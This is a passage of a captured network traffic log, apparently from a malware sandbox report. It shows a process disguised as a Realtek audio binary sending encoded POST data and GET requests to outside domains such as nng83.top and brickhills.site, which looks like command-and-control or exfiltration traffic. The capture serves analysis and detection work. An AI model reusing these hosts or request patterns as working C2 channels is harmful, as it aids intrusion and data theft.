                                                                                                                                                                                                                                Referer: http://www.nng83.top/mg8c/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 6d 68 70 72 69 4e 54 68 50 59 39 6b 5a 30 53 6f 4a 51 32 7a 58 77 42 6c 72 76 43 69 52 6f 73 71 6d 55 72 66 74 52 39 48 4d 6e 5a 56 31 35 4a 53 35 4f 70 41 37 43 32 35 4f 4e 73 51 37 75 71 41 45 44 78 50 4f 6e 61 47 55 56 57 42 39 31 74 63 47 75 47 6a 51 46 73 31 4c 76 48 6f 4c 7a 61 6a 67 53 52 6f 4d 45 59 53 70 6a 50 4f 37 31 4f 39 6b 6b 37 4c 4b 69 4a 6e 4a 6f 57 75 33 34 6b 4d 64 50 6a 44 59 37 6b 67 47 73 78 69 66 50 78 63 4a 36 42 5a 49 5a 4c 38 57 51 32 42 55 47 51 62 32 50 54 54 48 79 59 4d 4b 6e 41 72 46 61 71 67 51 57 53 7a 6c 74 2f 62 35 42 4a 63 57 6e 74 71 6d 56 32 69 74 73 67 6a 39 5a 2f 64 51 56 64 31 50 4e 67 30 48 54 55 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=mhpriNThPY9kZ0SoJQ2zXwBlrvCiRosqmUrftR9HMnZV15JS5OpA7C25ONsQ7uqAEDxPOnaGUVWB91tcGuGjQFs1LvHoLzajgSRoMEYSpjPO71O9kk7LKiJnJoWu34kMdPjDY7kgGsxifPxcJ6BZIZL8WQ2BUGQb2PTTHyYMKnArFaqgQWSzlt/b5BJcWntqmV2itsgj9Z/dQVd1PNg0HTU=
                                                                                                                                                                                                                                Dec 3, 2024 14:53:13.461844921 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:53:13 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                27192.168.11.204978638.47.233.4807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:53:15.985086918 CET2578OUTPOST /mg8c/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.nng83.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.nng83.top
                                                                                                                                                                                                                                Referer: http://www.nng83.top/mg8c/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 6d 68 70 72 69 4e 54 68 50 59 39 6b 5a 30 53 6f 4a 51 32 7a 58 77 42 6c 72 76 43 69 52 6f 73 71 6d 55 72 66 74 52 39 48 4d 6e 52 56 31 72 42 53 34 74 52 41 34 43 32 35 51 64 73 4e 37 75 71 4e 45 44 70 4c 4f 6e 6e 37 55 52 6d 42 2f 57 31 63 50 36 53 6a 65 46 73 31 41 50 48 70 57 6a 62 70 67 53 68 7a 4d 45 49 53 70 6a 50 4f 37 33 47 39 74 57 54 4c 4e 53 4a 6b 4f 6f 57 36 38 59 6b 33 64 4c 33 54 59 37 68 62 46 66 4a 69 66 76 68 63 4d 4d 64 5a 41 5a 4c 2b 58 51 33 45 55 47 64 62 32 4c 4c 70 48 78 46 58 4b 67 63 72 42 2b 7a 68 4a 48 4b 73 2f 73 6a 48 34 44 46 45 65 30 5a 47 67 43 79 66 72 66 30 64 35 74 2f 59 4d 46 46 43 54 59 6b 6f 5a 30 65 4d 65 56 52 4e 76 2f 51 4c 38 72 4f 6f 72 54 6b 38 34 4d 63 4a 4b 75 4d 56 51 4e 50 77 73 4e 59 6c 66 63 38 77 43 52 34 61 65 68 4b 7a 6e 57 74 44 50 6f 59 36 68 6f 72 53 2b 58 79 54 4c 6d 67 4c 4f 6b 47 58 48 73 69 66 55 31 2b 6a 44 34 4d 44 59 58 72 4e 48 44 6a 7a 39 77 4e 61 46 42 44 48 74 72 6c 52 45 31 5a 35 47 36 48 7a 47 35 6d 78 7a 6c 7a [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: pluxVm=mhpriNThPY9kZ0SoJQ2zXwBlrvCiRosqmUrftR9HMnRV1rBS4tRA4C25QdsN7uqNEDpLOnn7URmB/W1cP6SjeFs1APHpWjbpgShzMEISpjPO73G9tWTLNSJkOoW68Yk3dL3TY7hbFfJifvhcMMdZAZL+XQ3EUGdb2LLpHxFXKgcrB+zhJHKs/sjH4DFEe0ZGgCyfrf0d5t/YMFFCTYkoZ0eMeVRNv/QL8rOorTk84McJKuMVQNPwsNYlfc8wCR4aehKznWtDPoY6horS+XyTLmgLOkGXHsifU1+jD4MDYXrNHDjz9wNaFBDHtrlRE1Z5G6HzG5mxzlz7nunF+jA+61eLZMcPyZGZypbztKo+d+AhJj6ln9DDQega0jD6+Lk1dpeQsvtpprEEvRnp7PXNenFNnUYCrY1ULfMvL6seXA2DMGK7IZi78fEy311DS8qGScoitVN6bod3dsdKTf7r7Pk9lknnVLqiaGWiVzzsfHmYDCbKgxgECtDwDod6owp0gnWhfYmGWbkIqIm3spGFbXzm3IgCj/xNpmjfdGqGB+7McZJm86pvBDhk9sKmOS/gyodXQP7YFBSCHaJDlzQkQpzQ8xkk9NsberUE7tcx/OaMUNSTlhudZWsdwwbZP6GVoznRzwnHWqfXqHoPS2gb8IAlyyiPAdi0YbRe+U0IgogvKbrGx7RzzGgL1bD3TyhsILU5UcvSVtgyUoPTp6VilWKCeCf4FlywcqF4YdXEmRoFri7NULORwerSreW9ezLFNr8yhj0mRLPqrpZrvAEunveLCTRdSQRWF4kQnlGlr6QNVJYbmowW2kIngCn10wN/hAsgliUFk1rq2h5bWStQFBJOLqFMFhrDVG1cvRoFviNPT9Eiakl7fxSSDp2IL30I3oXkWrffHvefANCv5B7EoUh4OxkdigyUwJVCCjiBsD+qLU6MvSTwl/o+BLD8Zn5tgnjG3vpkBRLaymTdY/vtit5puy0tKdTqgLqTjYkPKvpMP [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:53:15.985142946 CET5262OUTData Raw: 37 45 45 79 73 71 65 38 4b 48 37 42 42 51 4c 31 44 50 46 34 46 52 71 68 39 52 31 33 37 64 43 6a 2b 49 45 62 2f 46 78 6b 4f 41 44 48 78 50 76 58 47 68 30 41 70 65 50 47 39 7a 70 35 4b 38 4b 68 68 48 63 4c 72 4e 34 65 54 4d 32 50 74 4f 44 45 6a 48
                                                                                                                                                                                                                                Data Ascii: 7EEysqe8KH7BBQL1DPF4FRqh9R137dCj+IEb/FxkOADHxPvXGh0ApePG9zp5K8KhhHcLrN4eTM2PtODEjHlAAJRCe1L+Xbu/WwRZOhpxTH124YaYkaTkJkAZQPba5i9LeNX1UaCPGwWwaoL8aUG2ipFXulQxmPkI6HSw1Tb8BbxveOjSIt+qBktm/K6mF7aaUZjwXA/vATPUaSOUBtpocQUsyXSI7Tzxvo4J7IkeC/C+Nvm86o8
                                                                                                                                                                                                                                Dec 3, 2024 14:53:16.304142952 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:53:16 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                28192.168.11.204978738.47.233.4807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:53:18.827400923 CET416OUTGET /mg8c/?pluxVm=rjBLh9a8fZJRcQu9K1C3LAtp+/ShEoEfzH3ui2xMInNHtYlxt8Nl0C2ZPsNy1cCyYgBvBEXXCVeazEdoFLasWgZ3AJaOWiiv1TsNcWo9tyTPmHKnoGX/TSk=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.nng83.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:53:19.146908045 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:53:18 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                29192.168.11.2049788103.224.182.242807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:53:24.509988070 CET689OUTPOST /vwn2/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.brickhills.site
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.brickhills.site
                                                                                                                                                                                                                                Referer: http://www.brickhills.site/vwn2/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 78 5a 56 78 4a 5a 77 73 5a 6d 72 79 30 76 67 54 63 49 75 7a 67 35 76 4e 33 37 54 2f 50 6c 2b 41 44 78 6f 45 51 58 4d 34 55 4d 54 49 63 33 6e 35 54 76 71 77 5a 4f 66 32 65 48 53 68 4c 45 34 59 4e 77 48 68 4e 63 4d 4c 32 4f 78 69 30 71 50 76 38 6e 4e 6e 42 49 56 4e 32 6f 52 43 6e 33 34 5a 66 6b 33 54 72 34 47 4a 49 55 42 65 6c 77 4a 51 54 50 56 76 4b 2f 2f 6b 31 67 76 72 49 6f 30 49 51 43 34 30 63 31 62 6f 68 49 73 50 72 41 31 39 2b 61 64 72 32 4c 59 78 62 33 71 6d 6b 47 71 74 61 46 62 69 31 44 4e 79 50 59 38 49 53 56 4c 4f 67 4b 39 78 6c 53 64 39 73 5a 70 65 49 61 62 6e 5a 41 3d 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=xZVxJZwsZmry0vgTcIuzg5vN37T/Pl+ADxoEQXM4UMTIc3n5TvqwZOf2eHShLE4YNwHhNcML2Oxi0qPv8nNnBIVN2oRCn34Zfk3Tr4GJIUBelwJQTPVvK//k1gvrIo0IQC40c1bohIsPrA19+adr2LYxb3qmkGqtaFbi1DNyPY8ISVLOgK9xlSd9sZpeIabnZA==
                                                                                                                                                                                                                                Dec 3, 2024 14:53:24.700347900 CET874INHTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Tue, 03 Dec 2024 13:53:24 GMT
                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                set-cookie: __tad=1733234004.7002375; expires=Fri, 01-Dec-2034 13:53:24 GMT; Max-Age=315360000
                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                content-length: 579
                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 57 6c 03 12 db 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 59 f2 24 26 69 50 e4 bf 97 72 dc 8f 75 87 56 17 5b d4 23 df 7b 34 e5 a2 a5 4e 57 51 d1 a2 a8 f9 41 8a 34 56 4b a7 e4 a6 55 5a fb cc 2b c2 22 3f 85 a3 c2 4b a7 7a 02 3a f4 58 c6 84 b7 94 af c5 4e 9c a2 31 78 27 cb 38 5f fb bc 51 66 85 ae 77 ca 50 ae 54 83 59 a7 4c b6 f6 71 55 e4 27 ec 6b a5 aa 68 27 1c 38 ac 95 43 49 7f b4 32 1b 28 21 69 89 fa 79 9e ef f7 fb ec 85 c4 7c b7 37 ef f3 cf c9 22 8a f2 1c 6e 90 40 00 a9 0e ed 96 c0 36 70 35 9b 41 a7 a4 b3 1e a5 35 b5 07 b2 80 b7 28 b7 84 0c 7c e0 01 d5 00 b5 08 cf e4 43 ef 6c a7 3c c7 84 d2 1e 1a eb c0 db 0e 39 45 78 6b a2 66 6b 24 29 6b f8 58 eb a5 90 9b eb b1 54 3a 85 bb 68 b2 57 a6 b6 fb 4c 5b 29 02 2a 73 d8 6b 21 31 fd c7 d8 79 d2 f4 e5 c5 a7 64 ba 88 8e 51 44 ee 10 32 59 a5 27 70 b5 fb 35 9a 28 c1 23 8d 9b f4 25 db bb 60 90 f3 27 a1 6b 4d ff 73 d4 5c c2 d7 27 27 df 6f 58 87 a8 d3 bb ce 1a 45 96 43 ab 79 90 ed f1 18 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: TMo0=pvNWl;a"Y$&iPruV[#{4NWQA4VKUZ+"?Kz:XN1x'8_QfwPTYLqU'kh'8CI2(!iy|7"n@6p5A5(|Cl<9Exkfk$)kXT:hWL[)*sk!1ydQD2Y'p5(#%`'kMs\''oXECy2$&ZB3}jw#:vobIRnz:}[tM<57vG`ZJZm]5!-og-j!LjYa\$U!uqZt8L!tE.1S;Z*:$U/Vim<Ee<[?kX{{11#0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                30192.168.11.2049789103.224.182.242807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:53:27.206959963 CET709OUTPOST /vwn2/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.brickhills.site
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.brickhills.site
                                                                                                                                                                                                                                Referer: http://www.brickhills.site/vwn2/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 78 5a 56 78 4a 5a 77 73 5a 6d 72 79 31 50 77 54 54 4c 57 7a 72 35 76 4f 39 62 54 2f 42 31 2b 63 44 78 73 45 51 54 56 7a 55 2f 6e 49 63 54 6a 35 53 75 71 77 59 4f 66 32 57 6e 53 6b 55 55 35 55 4e 77 4c 70 4e 65 49 4c 32 4f 6c 69 30 6f 58 76 2f 55 31 6f 48 49 56 44 74 34 52 41 70 58 34 5a 66 6b 33 54 72 35 6d 7a 49 55 5a 65 6c 44 52 51 43 65 56 6f 4a 2f 2f 6e 39 41 76 72 43 34 30 45 51 43 35 52 63 30 48 43 68 4b 6b 50 72 46 52 39 2f 4c 64 73 38 4c 59 7a 47 6e 72 47 30 6d 44 2f 61 6b 69 52 6a 68 42 7a 58 61 4d 6a 58 44 47 55 39 34 4a 56 6d 42 42 50 6f 70 51 32 4b 59 61 38 45 4b 52 64 76 48 30 2f 4b 2f 7a 52 44 51 38 43 39 47 4a 77 43 38 38 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=xZVxJZwsZmry1PwTTLWzr5vO9bT/B1+cDxsEQTVzU/nIcTj5SuqwYOf2WnSkUU5UNwLpNeIL2Oli0oXv/U1oHIVDt4RApX4Zfk3Tr5mzIUZelDRQCeVoJ//n9AvrC40EQC5Rc0HChKkPrFR9/Lds8LYzGnrG0mD/akiRjhBzXaMjXDGU94JVmBBPopQ2KYa8EKRdvH0/K/zRDQ8C9GJwC88=
                                                                                                                                                                                                                                Dec 3, 2024 14:53:27.401585102 CET874INHTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Tue, 03 Dec 2024 13:53:27 GMT
                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                set-cookie: __tad=1733234007.2576216; expires=Fri, 01-Dec-2034 13:53:27 GMT; Max-Age=315360000
                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                content-length: 579
                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 57 6c 03 12 db 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 59 f2 24 26 69 50 e4 bf 97 72 dc 8f 75 87 56 17 5b d4 23 df 7b 34 e5 a2 a5 4e 57 51 d1 a2 a8 f9 41 8a 34 56 4b a7 e4 a6 55 5a fb cc 2b c2 22 3f 85 a3 c2 4b a7 7a 02 3a f4 58 c6 84 b7 94 af c5 4e 9c a2 31 78 27 cb 38 5f fb bc 51 66 85 ae 77 ca 50 ae 54 83 59 a7 4c b6 f6 71 55 e4 27 ec 6b a5 aa 68 27 1c 38 ac 95 43 49 7f b4 32 1b 28 21 69 89 fa 79 9e ef f7 fb ec 85 c4 7c b7 37 ef f3 cf c9 22 8a f2 1c 6e 90 40 00 a9 0e ed 96 c0 36 70 35 9b 41 a7 a4 b3 1e a5 35 b5 07 b2 80 b7 28 b7 84 0c 7c e0 01 d5 00 b5 08 cf e4 43 ef 6c a7 3c c7 84 d2 1e 1a eb c0 db 0e 39 45 78 6b a2 66 6b 24 29 6b f8 58 eb a5 90 9b eb b1 54 3a 85 bb 68 b2 57 a6 b6 fb 4c 5b 29 02 2a 73 d8 6b 21 31 fd c7 d8 79 d2 f4 e5 c5 a7 64 ba 88 8e 51 44 ee 10 32 59 a5 27 70 b5 fb 35 9a 28 c1 23 8d 9b f4 25 db bb 60 90 f3 27 a1 6b 4d ff 73 d4 5c c2 d7 27 27 df 6f 58 87 a8 d3 bb ce 1a 45 96 43 ab 79 90 ed f1 18 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: TMo0=pvNWl;a"Y$&iPruV[#{4NWQA4VKUZ+"?Kz:XN1x'8_QfwPTYLqU'kh'8CI2(!iy|7"n@6p5A5(|Cl<9Exkfk$)kXT:hWL[)*sk!1ydQD2Y'p5(#%`'kMs\''oXECy2$&ZB3}jw#:vobIRnz:}[tM<57vG`ZJZm]5!-og-j!LjYa\$U!uqZt8L!tE.1S;Z*:$U/Vim<Ee<[?kX{{11#0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                31192.168.11.2049790103.224.182.242807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:53:29.909235001 CET2578OUTPOST /vwn2/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.brickhills.site
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.brickhills.site
                                                                                                                                                                                                                                Referer: http://www.brickhills.site/vwn2/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 78 5a 56 78 4a 5a 77 73 5a 6d 72 79 31 50 77 54 54 4c 57 7a 72 35 76 4f 39 62 54 2f 42 31 2b 63 44 78 73 45 51 54 56 7a 55 2f 2f 49 66 6d 33 35 54 4e 43 77 62 4f 66 32 59 48 53 6c 55 55 35 64 4e 77 6a 74 4e 65 45 39 32 4e 64 69 33 4e 4c 76 30 46 31 6f 55 6f 56 44 6b 59 52 42 6e 33 35 45 66 6e 66 66 72 35 57 7a 49 55 5a 65 6c 47 64 51 43 50 56 6f 50 2f 2f 6b 31 67 76 33 49 6f 30 67 51 43 68 6e 63 30 44 34 68 62 45 50 73 6c 42 39 38 35 46 73 6d 4c 59 31 46 6e 72 6b 30 6d 65 68 61 6e 58 67 6a 67 31 64 58 64 34 6a 61 79 72 51 6c 62 42 49 6c 78 64 50 72 4b 45 52 65 71 43 56 61 59 64 67 67 6b 59 45 49 4a 50 45 4a 78 73 56 69 32 68 33 54 73 50 49 7a 59 38 38 69 34 69 33 58 75 4d 38 39 6c 58 6e 6d 4a 47 34 55 74 6c 2b 33 4c 65 63 6a 65 7a 5a 67 55 36 74 76 61 6f 54 68 46 4b 44 66 38 32 56 2b 41 63 68 47 53 4d 48 76 4c 51 69 49 34 76 30 66 6f 51 2b 6e 2f 61 31 50 39 68 44 6c 6a 75 58 46 6a 4f 55 35 38 6a 6b 4b 6f 7a 4f 43 67 5a 36 6f 56 4c 58 79 49 7a 71 51 48 7a 4c 2b 77 51 4e 62 55 61 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: pluxVm=xZVxJZwsZmry1PwTTLWzr5vO9bT/B1+cDxsEQTVzU//Ifm35TNCwbOf2YHSlUU5dNwjtNeE92Ndi3NLv0F1oUoVDkYRBn35Efnffr5WzIUZelGdQCPVoP//k1gv3Io0gQChnc0D4hbEPslB985FsmLY1Fnrk0mehanXgjg1dXd4jayrQlbBIlxdPrKEReqCVaYdggkYEIJPEJxsVi2h3TsPIzY88i4i3XuM89lXnmJG4Utl+3LecjezZgU6tvaoThFKDf82V+AchGSMHvLQiI4v0foQ+n/a1P9hDljuXFjOU58jkKozOCgZ6oVLXyIzqQHzL+wQNbUafLjmKEJKz6vRxqFwMFkvLhsfABSfrxnBH86YwfMd35nBCRpXhdlF8hUMM4LQt2rVyjWosHqav26pfaepbWBxQ8I3/qkSFpa48IX39BBNQm9Sd4OilVcjAGdEfWmcnbN6sfmU4aprj8OjN6gSxe0FZrD5WjDnHz3GziRQ6ciH1aVUpQhqCTEv4P2nFIgcCZBT7VkO0+nRpgAOhCKq5d0wC/CI+/hPbIan8quFhnCpgXaJH06ICd/z2PvMuPLRKZxFTu1dgXjYgyFqaum2LmE4pNQBD5DFniZ91fLv8OjZdxm3LYOJK4EDPbIeA8VihCa32JUlds9xQmjkFsDZRQEqsXZIICpV0Nv/r0pIp+y79tmCXiOjRo02NmIZ4FxK38CR9FoalI1UX8oe0WPR9l4j0X97KZ4jLFXXQiVp9BDQ1OlbZwF0InWnwFtK90rDPMNjHC3/R9qVebewOJK/wnThZ0RxIUQUsNGZvTlGJOr1d6gmRvcoE1eAKbHzV0Okl5jY7QKQzSSxZkKA30ghTFq7waJ1FbkKxHulMt4mSBpmu14TXHKPMll9eEGd9VrmiTHvoor3Rpu0im8Z2jhjlbVr6WMk1J+1PQmb2vodKsd3xIzgeV6lZtKWPZ26aye9d7gBxklr6gHqulp28S6i7nJt0IbVbIvxSSaYaB [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:53:29.909264088 CET5156OUTData Raw: 2b 33 2b 6e 39 51 68 37 6f 46 2f 32 50 50 73 4c 44 67 75 70 32 65 6b 74 39 7a 58 32 6f 67 6a 77 65 6f 65 66 6f 35 67 6e 76 52 52 69 50 4b 68 76 53 74 74 56 2f 42 32 43 6b 5a 30 63 50 46 49 6d 42 36 6d 75 7a 54 52 49 6c 43 78 65 77 47 34 42 61 76
                                                                                                                                                                                                                                Data Ascii: +3+n9Qh7oF/2PPsLDgup2ekt9zX2ogjweoefo5gnvRRiPKhvSttV/B2CkZ0cPFImB6muzTRIlCxewG4BavWj4vZPPS4pejifR3iTJ1attUBLhYYgMq+0+qVyFTlLQAVp7xe2rVC6lO/iwnpXLLR1x204NIAJHLun05kRUmQpI1DBxu2e5g3f8gbIuQoI1iht6BCG2Swb+BMwevu6xy0JvCWepCc5FeSrApqcfp9BGvNYwg8Qqvu
                                                                                                                                                                                                                                Dec 3, 2024 14:53:29.909336090 CET124OUTData Raw: 52 73 78 35 7a 31 64 68 6b 31 66 67 6b 4f 71 6c 47 6a 33 46 4a 47 4c 66 54 53 46 47 54 41 33 35 56 76 4c 6d 48 55 59 66 32 77 67 47 71 6a 49 70 48 43 6f 6d 66 32 43 6f 71 74 36 7a 58 64 58 4f 78 4d 59 79 4c 56 4d 55 75 64 38 52 42 65 34 61 52 48
                                                                                                                                                                                                                                Data Ascii: Rsx5z1dhk1fgkOqlGj3FJGLfTSFGTA35VvLmHUYf2wgGqjIpHComf2Coqt6zXdXOxMYyLVMUud8RBe4aRH2TcQlEX8n91Iq/SoYlU556K4LxCSW7kkKpMulDjg==
